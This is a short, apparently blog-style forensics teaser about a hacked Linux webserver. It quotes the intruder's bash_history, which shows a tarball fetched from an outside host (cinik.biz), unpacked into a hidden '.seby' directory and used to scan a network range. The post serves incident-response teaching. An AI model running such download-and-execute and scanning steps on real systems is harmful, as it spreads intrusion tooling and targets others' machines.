Forensics: Anatomy Of An Attack

Forensics: Anatomy Of An Attack

06.09 04:27 - Forensics: Anatomy Of An Attack

"Oh $#!t! My webserver has been hax0r3d!" You are called to the scene. Imaging of the victim's media is complete. It's a unix box of some sort. Linux? You glance inside the user's bash_history file and find:
fred:/home/best# more .bash_history uname -a php -v passwd exit wget ftp curl ncftp lynx cd /var/tmp ls uptime lynx cinik.biz/seby.tgz ls ls -a lynx cinik.biz/seby.tgz ls tar zxvf seby.tgz rm -rf seby.tgz ls cd .seby ;s ls ./scan ./scan 24.15

more... back...